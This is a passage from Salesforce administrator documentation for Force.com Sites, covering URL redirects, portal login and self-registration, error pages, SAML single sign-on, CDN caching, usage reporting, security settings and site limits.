avoid this, set up site URL redirects to inform users and search engines that site content has moved.

Consider the following while implementing site URL redirects:

• You can't redirect error pages or CSS files (files with a .css extension).

• Each site can have a maximum of 1,000 redirect rules.

• Query parameters in site URL redirects are matched exactly. However, you can't redirect any URLs that include the
lastMod parameter.

• If you have URL rewriting enabled on your site, it runs after any site page redirects.

• You can redirect a community home page to its companion Site.com home page. To do this, set the Source URL to /,
which represents the home page for the community, and set the Target URL to s, which represents the home page for
the Site.com site.

To assign a redirect to a site page:

1. From Setup, click Develop > Sites.
2. Click a site label.
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3. Click URL Redirects on the site detail page.
4. Specify the former page location in the Source URL field. The page location must:

• Be a relative URL. It can have any valid extension type, such as .html or .php.
• Not contain anchors, such as /siteprefix/page.html#target.

Note:  Organizations that use sites with prefixes must manually add the prefix to the Source URL and Target
URL fields. Also, if your organization has a root level site and one with a prefix, and you want to redirect a page
in your prefixed site but don't include the prefix in the redirect rule, Salesforce will default to looking for the rule
in your root site instead, resulting in a 404 error.

5. Specify the Redirect Type:

• Permanent (301)—Select this option if you want users and search engines to update the URL in their systems when
visiting the page. Users visiting a page redirected with this type are sent seamlessly to the new page. Using a permanent
redirect ensures that your URLs retain their search engine popularity ratings, and that search engines index the new
page and remove the obsolete source URL from their indexes.

• Temporary (302)—Select this option if you want users and search engines to keep using the original URL for the page.
Search engines interpret a 302 redirect as one that could change again at any time, and though they index and serve up
the content on the new target page, they also keep the source URL in their indexes.

6. Specify the new page location in the Target URL field. This can be a relative URL or a fully-qualified URL with an
http:// or https:// prefix. Unlike source URLs, target URLs can contain anchors.

7. Click Save.

The Redirect Rules section displays all URL redirect rules you've created for your site. In this section you can:

• Edit an assigned redirect rule.

• Activate or deactivate a redirect rule.

• Delete a redirect rule.

• Click the Source URL or Target URL column heading to sort the list in ascending or descending order.

See Also:
Force.com Sites Overview

Associating a Portal with Force.com Sites

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

You can enable users to register for or log into an associated portal seamlessly from your site.
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Note: Only Customer Portals can be used for self-registration. Partner portals do not support self-registration.

The Authenticated Website high-volume portal user license is specifically designed to be used with Force.com sites.
Because it's designed for high volumes, it should be a cost-effective option to use with Force.com sites.

1. Enable the portal for login using the following steps:

a. From Setup, click Customize > Customer Portal > Settings, or from Setup, click Customize > Partners > Settings.
b. If you have not enabled your portal, select Enable Customer Portal or Enable Partner Relationship

Management and click Save.
c. Click Edit for the portal you want to modify.
d. Configure the portal as follows:

i. Select the Login Enabled checkbox.
ii. Select a user for the Administrator field.
iii. Optionally, set the Logout URL. If this is not set, users are taken to the site home page on logout.
iv. Click Save.

2. If you are using a Customer Portal and want to allow self-registration, follow these steps:

a. From Setup, click Customize > Customer Portal > Settings.
b. Click Edit for the portal you want to associate with your Force.com site.
c. Configure the Customer Portal as follows:

i. Select Self-Registration Enabled.
ii. Select Customer Portal User for both the Default New User License and Default New User Profile

fields. Depending on your portal license, you may want to select a different profile for the Default New User
Profile field.

iii. Select User for the Default New User Role field.
iv. Click Save.

Note:  Consider the following when allowing self-registration:

• Sites does not support the use of Person Accounts for self registration.
• On self-registration through a site:

◊ Validation rules are enforced on user creation.
◊ Validation rules are ignored on contact creation.

3. Associate the site pages with the default portal users:

a. From Setup, click Customize > Customer Portal > Settings, or from Setup, click Customize > Partners > Settings.
b. Click the name of the portal that you want to associate with your site.
c. Click the name of each profile associated with your portal users and do the following:

i. Scroll down to the Enabled Visualforce Page Access section and click Edit.
ii. Add the appropriate public site pages to the Enabled Visualforce Pages list. This allows portal users with

that profile to view these pages.

3452

Configuring Force.com SitesCreating Websites



Note:  By default, portal users can see all pages enabled for the associated public site, so you only have to
enable the pages that require authentication.

iii. Click Save.

4. Associate your site with the login-enabled portal:

a. From Setup, click Develop > Sites.
b. Click the site label of the site you want to configure.
c. Click Login Settings.
d. Click Edit.
e. From the Enable Login For drop-down list, select the name of the portal where you want to allow login.
f. Select the Change Password Page.
g. Click Save.

For sites with Ideas, Answers, Chatter Answers, you must make the zone visible in the portal and enable the IdeasHome or
AnswersHome page for the site. To associate the zone with one or more portals:

1. From Setup, click one of the following:

• Customize > Ideas > Zones
• Customize > Chatter Answers > Zones
• Customize > Answers > Zones

or .
2. Click Edit next to the zone you want to make public.
3. From the Portal drop-down list, select the portal to use for this zone. You can choose to show the zone in all portals.

Note:  For ideas to work with sites, the organization must have an active portal associated with that zone. Otherwise,
users will encounter errors.

See Also:
Configuring Force.com Sites
Managing Force.com Site Login and Registration Settings
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Managing Force.com Site Visualforce Pages

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Force.com sites uses Visualforce pages for all site and error pages. Sample error pages use the SiteSamples static resource for
their stylesheet and images.

Warning:  Don't rename or delete SiteSamples or you may get an error.

All pages that you want to expose on a site must be associated with that site. If a page is not listed under Site Visualforce
Pages, an authentication or page-not-found error is displayed based on the existence of the page.

To enable Visualforce pages for your site:

1. From Setup, click Develop > Sites.
2. Click the name of the site you want to modify.
3. Click Edit on the Site Visualforce Pages related list.
4. Use the Add and Remove buttons to enable or disable Visualforce pages for your site.
5. Click Save.

Note: If you select a Visualforce page for any of the lookup fields on the Site Detail page, any of the error pages, or
the Change Password Page under login settings, that page is automatically enabled for your site. If you remove
a page from this list, but it is still selected in one of these places, public users can access that page. To completely
remove pages from your site, disable them here and make sure they are not selected in any lookup fields for your site.

If you don't want to enable a Visualforce page for your entire site, you can also enable pages for specific profiles.

The My Profile Page

The My Profile page is a Visualforce page associated with a Customer Portal or site user's profile. The My Profile page enables
users logged into either your Force.com site, or your Customer Portal from Force.com sites, to update their own contact
information. When they make changes to this page, the corresponding portal user and contact records are updated.

The My Profile page can be enabled either for your entire site or in a more restricted way by assigning it to the site guest user
profile.

The My Profile page is also delivered as part of the Customer Portal Welcome component on your home page layout.

See Also:
Managing Force.com Site Standard Pages
Assigning Force.com Site Error Pages
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Managing Force.com Site Standard Pages

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Force.com sites uses Visualforce pages for all site and error pages. Force.com also provides some standard pages that you can
use.

All pages that you want to expose on a site must be enabled for that site. If a page is not listed under Site Standard Pages,
Salesforce displays an authorization required error.

To control which standard pages users see for your site:

1. From Setup, click Develop > Sites.
2. Click the name of the site you want to view.
3. Click Edit on the Site Standard Pages related list.
4. Use the Add and Remove buttons to enable or disable the following standard pages for your site:

• Home Page—The standard page associated with the Home tab (/home/home.jsp).
• Ideas Pages—The standard pages associated with ideas. If you want to use default ideas pages (for example, IdeasHome),

enable these pages.
• Answers Pages—The standard pages associated with answers. If you want to use default answers pages (for example,

AnswersHome), enable these pages.
• Search Pages—The standard Salesforce search pages. To allow public users to perform standard searches, enable these

pages.
• Lookup Pages—The standard Salesforce lookup pages. These are the popup windows associated with lookup fields on

Visualforce pages.

5. Click Save.

Note:  Make sure to disable any pages that you are not actively using in your site. Otherwise, they may be accessible
to public users. Also, make sure to set up private sharing to restrict search and lookup access for public users.

See Also:
Managing Force.com Site Visualforce Pages
Assigning Force.com Site Error Pages
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Assigning Force.com Site Error Pages

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Force.com sites uses Visualforce pages for all site and error pages. Sample error pages use the SiteSamples static resource for
their stylesheet and images.

Warning:  Don't rename or delete SiteSamples or you may get an error.

To set the error pages for your site:

1. From Setup, click Develop > Sites.
2. Click the name of the site you want to modify.
3. Click Page Assignment on the Error Pages related list.
4. Using the lookup fields, assign a Visualforce page or static resource for each of the standard error conditions listed:

• Authorization Required Page—The page users see when trying to access pages for which they do not have
authorization.

• Limit Exceeded Page—The page users see when your site has exceeded its bandwidth limits.
• Maintenance Page—The page users see when your site is down for maintenance.
• Service Not Available Page—The page users see when Salesforce servers are unavailable. This custom page is

rendered from a static resource that you choose. The static resource is uploaded to the cache server when assigned as
the Service Not Available page, and when updated after assignment. The custom page is shown for HTTP requests
only; caching is not used for HTTPS. Not available for Developer Edition or sandbox organizations.

If you haven't set a custom page for a site that uses a site prefix, the custom page for the root site is used when servers
are unavailable. For example, if http://mycompany.force.com/sales doesn't have a custom page, but
http://mycompany.force.com does, that custom page is used. Otherwise, the Maintenance page is shown by
default.

Note:  The static resource:

◊ Must be a public .zip file 1 MB or smaller.
◊ Must contain a page named maintenance.html at the root level of the .zip file. Other resources in the

.zip file, such as images or CSS files, can follow any directory structure.
◊ Must contain only files that have file extensions.

• Page Not Found Page—The page users see when trying to access a page that cannot be found. You can use the
action attribute on an <apex:page> component to redirect the Page Not Found error page. Using this kind of redirect
on any other error pages will redirect users to the Maintenance page.

• Generic Error Page—The page users see when encountering generic exceptions.
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Note:  When using static resources in a custom error page—such as a large image file or a large CSS file contained
in a static resource .zip file—each individual resource must be no larger than 50KB.  Otherwise, a 404 not found
error is returned for that resource.

5. Click Save.
6. On the Site Details page, click Preview to view the associated page as it would appear in a browser.

Tip:  Add the <site:previewAsAdmin /> component right before the closing </apex:page> tag in your custom
Visualforce error pages to view detailed site error messages in administrator preview mode.

See Also:
Managing Force.com Site Visualforce Pages
Managing Force.com Site Standard Pages

Troubleshooting Force.com Sites Using Administrator
Preview Mode

Available in: Developer, Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

If you see errors on site pages and can't figure out the cause, use administrator preview mode to look at them in context and
in greater detail.

Note:  Administrator preview mode is available for all active sites, including those with a branded custom Web address.

To access administrator preview mode:

1. From Setup, click Develop > Sites.
2. Click the name of the site you want to preview.
3. In the Site Detail section, click the Preview as Admin link. A new browser window opens with a preview of your site, and

the enhanced error message appears at the bottom of the page.
4. Click Logout of Administrator Preview Mode to clear the administrator cookie and be redirected to the site's home page.

The detailed error messages in administrator preview mode are driven by the <site:previewAsAdmin /> component in
your Visualforce error pages. Starting with Summer '10, new organizations include the <site:previewAsAdmin />
component by default in standard error pages. You must add the component manually to all custom error pages and pages
from older organizations. We recommend that you add it right before the closing </apex:page> tag, like this:

<site:previewAsAdmin />
</apex:page>
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Note:  The <site:previewAsAdmin /> component contains the <apex:messages /> tag, so if you have that
tag elsewhere on your error pages, you will see the detailed error message twice.

See Also:
Creating and Editing Force.com Sites
Assigning Force.com Site Error Pages

Enabling Single Sign-On for Sites
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Single sign-on is a process that allows network users to access all authorized network resources without having to log in
separately to each resource. Single sign-on allows you to validate usernames and passwords against your corporate user database
or other client application rather than having separate user passwords managed by Salesforce.

You can set up Sites to use SAML single sign-on, so that a customer only has to login once.

To enable single sign-on for Sites using an identity provider:

1. Set up either a Customer Portal or a partner portal.
2. Set up your Sites.
3. If you are using the Customer Portal, set up your Sites to use Customer Portal.
4. In addition to the SAML sign-on information that must be gathered and shared with your identity provider, you must

supply your information provider with the following:

• Organization ID
• Portal ID
• Sites URL

The following must be added as attributes to the SAML assertion sent from your identity provider:

• organization_id

• portal_id

• siteurl

To find these values:

a. From Setup, click Company Profile > Company Information and copy the ID located in the Salesforce
Organization ID.

b. For the Customer Portal, from Setup, click Customize > Customer Portal > Settings, click the name of the Customer
Portal, and copy the ID located in the Portal ID.
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For partner portals, from Setup, click Customize > Partners > Settings, click the name of the partner portal, and copy
the ID located in the salesforce.com Portal ID.

c. From Setup, click Develop > Sites, click the name of the Site, then copy the URL either located in the Default Web
Address, the Secure Web Address, or the Custom Web Address, depending on which one you want your users
to use when logging into Salesforce.

Service Provider Initiated SAML for Sites

Salesforce automatically provides single sign-on for Sites using SAML for when your company's identity provider initiates
login.

If you wanted to use SAML for Sites for when a service provider initiates sign-on, you must first create a Visualforce page
that provides a redirect to your server. The following is an example:

<apex:page showHeader="false" sidebar="false">
<script>

var PingSpURL =
"https://my.pingserver.com:9031/idp/startSSO.ping?PartnerSpId=salesforce.com.sp";

var siteLoginPage =
"&TargetResource={!$Site.CurrentSiteUrl}siteLogin?startUrl={!$Site.OriginalUrl}";

window.location = PingSpURL+siteLoginPage;
</script>
</apex:page>

Caching Force.com Sites Pages
Available in: Developer, Enterprise, and Unlimited Editions

Force.com sites enforces two 24-hour rolling limits—bandwidth and service request time—which vary by organization type.
Though the limits are high for active production organizations, your site could exceed the limit due to heavy traffic or pages
that consume lots of bandwidth or processing time. “Rolling 24-hour period” refers to the 24 hours immediately preceding
the current time.

Sites provide caching options that allow you to leverage the resources of our Content Delivery Network (CDN) partner to
improve page load times and site performance, as well as help you avoid reaching bandwidth or service request time limits.
Sites allows you to set the cache duration for each of your site pages and optimize content delivery to your end users.

Control the caching behavior for your site by setting the Boolean cache attribute and integer expires attribute on each
Visualforce page. By default, pages that do not have the cache attribute set are cached for ten minutes (600 seconds).

For example, a page whose cache is set to expire in 15 minutes looks like this:

<apex:page cache="true" expires="900">

Note:  The CDN is only available for active production organizations. It is not available for sandbox or Developer
Edition organizations.

To protect the integrity of sensitive information, SSL sessions and pages requested after authentication are not cached
via the CDN.

Attachments to public pages accessed through sites are automatically cached for 10 minutes via the CDN.
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Other factors also affect caching behavior, such as the type of user accessing the page, whether the request comes from the
caching server, and whether the site is login-enabled. The following tables summarize the caching behavior for each of these
cases.

For Requests Coming from the Caching Server

If the site is login-enabled:

Caching LocationCaching BehaviorCache Attribute

Caching server onlyCache expires according to user-set
value

Set to TRUE

Caching server onlyCache expires in ten minutesNot Set

NoneNot cachedSet to FALSE

If the site is not login-enabled:

Caching LocationCaching BehaviorCache Attribute

Both caching server and browserCache expires according to user-set
value

Set to TRUE

Both caching server and browserCache expires in ten minutesNot Set

NoneNot cachedSet to FALSE

For Requests Not Coming from the Caching Server

If the site is login-enabled:

Caching LocationCaching BehaviorCache Attribute

NoneNot cachedSet to TRUE

NoneNot cachedNot Set

NoneNot cachedSet to FALSE

If the site is not login-enabled:

Caching LocationCaching BehaviorCache Attribute

Browser onlyCache expires according to user-set
value

Set to TRUE

Browser onlyCache expires in ten minutesNot Set
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Caching LocationCaching BehaviorCache Attribute

NoneNot cachedSet to FALSE

See Also:
Viewing 24-Hour Force.com Sites Usage History
Force.com Sites Limits and Billing

Using Workflow for Force.com Sites
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create or change workflow rules:

“Customize Application”To create and edit Force.com sites:

With workflow for sites, you can create workflow rules that trigger email alerts when certain site-related criteria are met. For
example, create a rule that sends your site administrator an email alert when bandwidth usage reaches 80% of the daily bandwidth
limit or when a site's status changes from the active state.

Setting up the right site usage workflow rules can help you keep your sites from exceeding rolling 24-hour limits for bandwidth
and service request time, and monthly limits for page views and logins. Workflow rules that are created on the Site object are
evaluated every hour for all sites within the organization, unless your criteria is limited to certain sites. Workflow rules that
are created on the Organization and User License objects are evaluated every three hours.

Only email alert actions are supported for site usage workflow rules. Other workflow actions, such as field updates, tasks, and
outbound messages, are not available.

To create a site usage workflow rule, from Setup, click Create > Workflow & Approvals > Workflow Rules, then use the
workflow rule wizard with the following settings:

Select Object

When selecting an object, choose one of the following:
• Organization (for monthly page views allowed and monthly page views used fields)

• Site (for site detail, daily bandwidth and request time, monthly page views allowed, and other fields)

• User License (for the monthly logins allowed and monthly logins used fields)

The Organization and Site objects are only available if Force.com sites is enabled for your organization. The User License
object isn't dependent on sites, and is only available if you have Customer Portals or partner portals enabled for your
organization.

Rule Criteria

Enter your rule criteria by doing one of the following:
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• Choose criteria are met and select the filter criteria that a site must meet to trigger the rule. For example, to
trigger the rule every time the active status changes for a site within your organization, set the filter to Site Status
not equal to Active. To add more rows or to set up Boolean conditions, click Add Filter Logic.

• Choose formula evaluates to true and enter a formula. The rule is triggered if the formula returns “True.”

For example, the following formula triggers the rule when bandwidth usage reaches 80% of the daily bandwidth
limit:

DailyBandwidthUsed >= 0.8 * DailyBandwidthLimit

In the next example, the formula triggers the rule when time usage reaches 80% of the daily time limit:

DailyRequestTimeUsed >= 0.8* DailyRequestTimeLimit

Workflow actions

When adding workflow actions, click Add Workflow Action and choose New Email Alert or Select Existing
Action.

Tip:  To create custom email templates using Site merge fields, from Setup, click Communication Templates
> Email Templates, then New Template. When configuring the template, use Site merge fields by selecting
Site Fields in the Select Field Type drop-down list of the Available Merge Fields section.

See Also:
Force.com Sites Overview

Tracking Your Force.com Site with Google Analytics
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Force.com sites provides out-of-the-box integration with Google Analytics. Use Google Analytics to track the usage of your
sites and site pages, including number of visits, number of page views, average time spent on site, and more.

Note:  The <site:googleAnalyticsTracking/> component only works on pages used in a Force.com site.
Sites must be enabled for your organization and the Analytics Tracking Code field must be populated. To get
a tracking code, go to the Google Analytics website.

To track a site using Google Analytics:

1. Sign up for an account at Google Analytics.
2. Add a new profile in Google Analytics and enter the domain or full URL for the site you want to track.
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3. Copy the Web Property ID from Google's tracking status information and paste it into the Analytics Tracking
Code field on the Site Edit page for the site you want to track. The Web property ID starts with the letters UA followed
by your account and profile numbers. For example, UA-9049246-2.

4. Click Save.
5. To track the Visualforce pages associated with your site, enter the following tag in the site template for those pages, or in

the individual pages themselves:

<site:googleAnalyticsTracking/>

Pages that don't contain the tag and aren't associated with a site template that contains the tag won't be tracked. The
default site template already contains the tag, so all pages using that template will be tracked—including certain default
pages.

Note: Google recommends adding the component at the bottom of the page to avoid increasing page load time.

6. Go to the Google Analytics site and follow their instructions for completing the process. After signing up, it may take up
to 24 hours to see initial tracking results in Google Analytics.

Tip:  To track multiple sites separately, create separate profiles using the full site URLs and enter a different Web
property ID in the Analytics Tracking Code field for each site.

See Also:
Managing Force.com Sites
Creating and Editing Force.com Sites
Viewing 24-Hour Force.com Sites Usage History
Reporting on Force.com Sites

Viewing Force.com Site History
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

To view the site history:

1. From Setup, click Develop > Sites.
2. Click the name of the site you want to view.
3. View the Site History related list.

The Site History related list tracks and displays the changes made to your site. All of the following events are tracked in the
site history, along with the user who made the change and the time it occurred:
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DescriptionEvent

Logs when each site was created.Site Creation

Changes to the following site values are logged:Site Detail Changes
• Site Label

• Site Name

• Site Description

• Site Contact

• Default Web Address

• Custom Web Address

• Active Status

• Active Site Home Page

• Inactive Site Home Page

• Site Template

• Site Robots.txt

• Site Favorite Icon

• Analytics Tracking Code

• Enable Feeds

Logs when any standard page is enabled or disabled.Site Standard Pages

Logs when any error page assignment is changed.Site Error Pages

Changes to the following login settings are logged:Login Settings Changes
• Portal

• Change Password Page

• Require Non-Secure Connections (HTTP)

Logs when any URL redirect is created, deleted, enabled,
disabled, or changed.

URL Redirect Changes

See Also:
Force.com Sites Overview
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Viewing 24-Hour Force.com Sites Usage History
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Monitor the bandwidth and request time usage for each of your sites by viewing the usage data tracked on this related list. By
closely monitoring your sites, you can avoid exceeding your limits.

To view the 24-hour usage history for your site:

1. From Setup, click Develop > Sites.
2. Click the name of the site you want to view.
3. View the 24-Hour Usage History related list. Usage information may be delayed by up to several minutes due to processing

time.

The 24-Hour Usage History related list tracks and displays the following usage metrics for your site:

How It's CalculatedMetric

Bandwidth is calculated as the number of megabytes served and received from the site's origin
server. The Daily Limit applies to a rolling 24-hour period.

Origin Bandwidth

“Service request time” is calculated as the total server time in minutes required to generate pages
for the site. The Daily Limit applies to a rolling 24-hour period.

Request Time

“Origin server” refers to the Web server that hosts your site. “Rolling 24-hour period” refers to the 24 hours immediately
preceding the current time.

For each metric, the related list displays Current Usage, Daily Limit, and the Percent Used.

See Also:
Tracking Your Force.com Site with Google Analytics
Reporting on Force.com Sites
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Reporting on Force.com Sites
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Download AppExchange Packages”To install packages:

“Run Reports”

AND

“Read” on the records included in reports

To run reports:

“Run Reports” and “Read” on the records included in the
reports

AND

“Create and Customize Reports”

To create, edit, save, and delete reports:

“Run Reports”

AND

“Manage Dashboards”

To create, edit, and delete dashboards:

To keep track of your site activity and usage, take advantage of the Sites Usage Reporting managed package to analyze your
monthly page views, daily bandwidth, and daily service request time so you can avoid reaching monthly and daily limits for
individual sites, as well as for your organization.

To get started using Salesforce analytics for sites:

1. Install the Sites Usage Reporting managed package.
2. Use packaged reports to analyze site usage.
3. Optionally, create custom reports to analyze site usage.
4. Use the Site Usage Dashboard to monitor sites.

Installing the Sites Usage Reporting Managed Package

The Sites Usage Reporting managed package, available on AppExchange, contains out-of-the-box reports and a dashboard
for monitoring sites usage.

To find the Sites Usage Reporting managed package, go to AppExchange and search on “sites reporting,” or go to
http://sites.force.com/appexchange/listingDetail?listingId=a0N30000001SUEwEAO.

Using Packaged Reports to Analyze Site Usage

The Sites Usage Reporting managed package contains the following reports to help you perform analytics on usage for the
sites in your organization. You can find these reports in the Site Usage Reports folder under All Reports in the Reports tab.
You can also select Site Usage Reports in the Folder drop-down list, then click Go.
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Note:  Site usage data is aggregated at midnight, GMT, so the current day's page view counts may not be accurately
reflected in reports, depending on your time zone. Cache server page views may take a day or more to be reflected in
reports.

DescriptionReport

Shows the total page views for the current period (calendar month), measured against
page views allowed. Page views are broken down by site and by day. The current period
limit applies to all sites within the organization.

Current Period Page Views

Shows the total bandwidth usage over the last 30 days, broken down by site, by day, and
by origin and cache servers.

Daily Total Bandwidth Usage

Shows the total page views over the last 30 days, broken down site, by day, and by origin
and cache servers.

Daily Total Page Views

Shows the total origin bandwidth usage over the last 30 days, broken down by site and
by day.

Site Daily Origin Bandwidth
Usage

Shows the total origin service request time over the last 30 days, broken down by site and
by day.

Site Daily Request Time Usage

Shows the sites that consumed the most bandwidth during the current period.Top Bandwidth Consuming Sites

Shows the sites that consumed the most service request time during the current period.Top Resource Consuming Sites

Shows the sites that generated the most page views during the current period.Top Sites by Page Views

Creating Custom Reports to Analyze Site Usage

You can also create custom reports on sites:

1. From the Reports tab, click New Report.
2. For the report type, select Administrative Reports, then Site Usage Reports. You must enable sites for your organization

and install the Sites Usage Reporting managed package to see the Site Usage Reports custom report type.
3. Click Create to create a custom report. Fields related to your sites, such as Site Name, Site Status, Daily Bandwidth

Limit, and Daily Request Time Limit can all be used in your custom report.

Note:  When you create your own custom reports using the Site Usage Reports custom report type, be aware that
the Origin Bandwidth column is measured in bytes, and the Request Time column is measured in milliseconds.
Make sure you consider the difference in units when comparing these columns to the Daily Bandwidth Limit
and Daily Request Time Limit columns, which are measured in megabytes and minutes, respectively.

For the out-of-the-box reports included with the managed package, bandwidth is measured in megabytes and request
time is measured in minutes.

Using the Site Usage Dashboard to Monitor Sites

The Sites Usage Reporting managed package contains the Site Usage Dashboard to help you monitor the sites in your
organization at a glance. The dashboard contains a component for each of the reports provided in the managed package.

To access the dashboard, from the Dashboards tab:

• Use the View Dashboard field.
• Or, click Go to Dashboard List and select Site Usage Dashboard from the dashboard list.
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To modify the dashboard, click Edit. You can also create your own custom dashboard using any custom reports you may have
created. Consider adding the Site Usage Dashboard as the dashboard snapshot on your home page.

See Also:
Viewing 24-Hour Force.com Sites Usage History
Tracking Your Force.com Site with Google Analytics

Force.com Sites Security
Available in: Developer, Enterprise, and Unlimited Editions

Consider the following security issues when setting up your Force.com site:

• If the Require Secure Connections (HTTPS) checkbox on the Session Settings page is selected, and the Require
Non-Secure Connections (HTTP) checkbox on the Login Settings page is not selected, users logging in to the
associated portal from the site will see the secure.force.com domain. For example, if you registered
mycompany.force.com as your custom domain, the URL changes to https://mycompany.secure.force.com
upon login. For more information, see Managing Force.com Site Login and Registration Settings.

• Customers using a script to login to sites can use the optional refURL URL parameter to retain the custom domain name
after login. This parameter has no effect if Require Non-Secure Connections (HTTP) has been set for the site or
Require Secure Connections (HTTPS) has been set for the organization. An example URL using refURL is:
http://mysite.secure.force.com/SiteLogin?refURL=http://mysite.com.

• To set restrictions based on IP or login hours, HTTPS is required. You must use the secure URL associated with your
Force.com domain to access your site.

• To enforce HTTPS on all Force.com sites pages and allow all IP addresses to access your site, create the following IP
ranges: 0.0.0.0 to 255.255.255.255, :: to ::fffe:ffff:ffff, and ::1:0:0:0 to
ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff. However, as this may degrade the performance of your site, don't
enforce HTTPS unless it is absolutely required. Changing from HTTP to HTTPS doesn't affect logged in users until the
next time they log in.

• Authenticated and non-authenticated users may see different error messages for certain conditions—for example, on Apex
exceptions.

• Only production organizations have the valid secure.force.com SSL certificates to access sites using HTTPS.

Note:  If a site within a sandbox (non-production) organization is accessed using HTTPS, a certificate name
mismatch warning may appear.

• Cache settings on static resources are set to private when accessed via a Force.com site whose guest user's profile has
restrictions based on IP range or login hours. Sites with guest user profile restrictions cache static resources only within
the browser. Also, if a previously unrestricted site becomes restricted, it can take up to 45 days for the static resources to
expire from the Salesforce cache and any intermediate caches.

Warning:

• We recommend setting the sharing to private for the objects on which you grant “Read” access for your site. This
ensures that users accessing your site can view and edit only the data related to your site.
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• We also recommend securing the visibility of all list views. Set the visibility of your list views to Visible to
certain groups of users, and specify the groups to share to. List views whose visibility is set to Visible
to all users may be visible to public users of your site. To share a list view with public users, create a new
public group for those users and give them visibility. If the object's sharing is set to private, public users won't be
able to see those records, regardless of list view visibility.

Force.com Sites-Related Apex Methods and Expressions
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Force.com Apex Methods

Apex methods for Force.com Sites are contained in the site class, cookie class, and urlRewriter class. See the Force.com
Apex Code Developer's Guide.

Force.com Sites-Related Expressions

Force.com also provides the following expressions to use on Visualforce pages, email templates, and s-controls:

DescriptionMerge Field

Returns the API name of the current site.$Site.Name

Returns the Force.com domain name for your organization.$Site.Domain

Returns the value of the Custom Web Address field for the current site.$Site.CustomWebAddress

Returns the original URL for this page if it’s a designated error page for the
site; otherwise, returns null.

$Site.OriginalUrl

Returns the value of the site URL for the current request (for example,
http://myco.com/ or https://myco.force.com/prefix/).

$Site.CurrentSiteUrl

Returns true if the current site is associated with an active login-enabled
portal; otherwise returns false.

$Site.LoginEnabled

Returns true if the current site is associated with an active
self-registration-enabled Customer Portal; otherwise returns false.

$Site.RegistrationEnabled

For authenticated users, returns true if the currently logged-in user's password
is expired. For non-authenticated users, returns false.

$Site.IsPasswordExpired

Returns the value of the Site Contact field for the current site.$Site.AdminEmailAddress

Returns the URL path prefix of the current site. For example, if your site
URL is myco.force.com/partners, partners is the path prefix. Returns

$Site.Prefix

null if the prefix is not defined, or if the page was accessed using a custom
Web address.
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DescriptionMerge Field

Returns the template name associated with the current site; returns the default
template if no template has been designated.

$Site.Template

Returns an error message for the current page if it’s a designated error page
for the site and an error exists; otherwise, returns an empty string.

$Site.ErrorMessage

Returns the error description for the current page if it’s a designated error
page for the site and an error exists; otherwise, returns an empty string.

$Site.ErrorDescription

The tracking code associated with your site. This code can be used by services
like Google Analytics to track page request data for your site.

$Site.AnalyticsTrackingCode

Note:  To use these expressions, the Force.com sites feature must be enabled for your organization. You must also
use them within the context of your public site; otherwise, an empty string is returned for all expressions except
{!$Site.Template}, which returns the default template for the site.

See Also:
Configuring Force.com Sites

Force.com Sites Considerations
Available in: Developer, Enterprise, and Unlimited Editions

Before creating and using Force.com sites, consider the following:

Packaging

The following apply to packaging for sites:
• Sites are not packageable. However, you can package sample code, Visualforce pages, Apex classes, or components

for a site using a managed package.
• You must have Force.com sites enabled to be able to install unmanaged packages that contain Visualforce pages or

Apex classes that refer to a site.

Access and Authentication

You can grant “Read” and “Create” permissions on all standard objects except products, price books, and ideas; and
“Read,” “Create,” “Edit,” and “Delete” on all custom objects. For additional access, you must authenticate site visitors
as portal users.

Custom authentication is not supported. You can authenticate via the following:
• Customer Portals—enable public login and registration

• Partner portals—create partner users
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Tip:  You can also enable single sign-on for portals, as well as Sites.

See Also:
Setting Up Force.com Sites

Force.com Sites Limits and Billing
Available in: Developer, Enterprise, and Unlimited Editions

Force.com sites usage is governed by monthly and daily limits. Understanding these limits is important to the success of your
sites. Salesforce.com provides tools to help you reduce bandwidth consumption and monitor site usage so that you can avoid
exceeding these limits.

This topic contains the following sections:

• Limits and Billing Terminology

• Sites Limits and Restrictions

• Billing and Monthly Page Views Enforcement

• What Counts as a Page View?

Limits and Billing Terminology

This section defines the terminology used for Force.com sites limits and billing:

• “Page Views” are calculated as the total number of pages served from either the site's origin server or the cache server.
• “Bandwidth” is calculated as the number of megabytes served and received from both the site's origin server and the cache

server.
• “Service request time” is calculated as the total server time in minutes required to generate pages for the site.
• “Rolling 24-hour period” refers to the 24 hours immediately preceding the current time.
• “Origin server” refers to the Web server that hosts your site.
• “Cache server” refers to the CDN server that serves your cached site pages.
• “Current period” refers to the current calendar month for which you are entitled a certain number of page views for your

organization.

Sites Limits and Restrictions

The following table lists the site limits for each edition:

Maximum Page
Views

Service Request Time (per
rolling 24-hour period per
site)

Bandwidth Limit (per rolling
24-hour period per site)

Maximum Number
of Sites

Edition

N/A10 minutes500 MB1Developer Edition
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Maximum Page
Views

Service Request Time (per
rolling 24-hour period per
site)

Bandwidth Limit (per rolling
24-hour period per site)

Maximum Number
of Sites

Edition

500,00030 minutes for sandbox

60 hours for production

1 GB for sandbox

40 GB for production

25Enterprise Edition

1,000,00030 minutes for sandbox

60 hours for production

1 GB for sandbox

40 GB for production

25Unlimited Edition

Make sure to consider all of the available caching options to help you avoid reaching these limits, and use the Site Usage
analytics tools to monitor your sites.

Billing and Monthly Page Views Enforcement

This section describes how salesforce.com enforces limits on monthly page views for sites:

• Billing is based on the number of monthly page views purchased for your organization. This page view limit is cumulative
for all sites in your organization.

• If, in a given calendar month, your organization reaches 110% of its page view limit, salesforce.com sends the site and
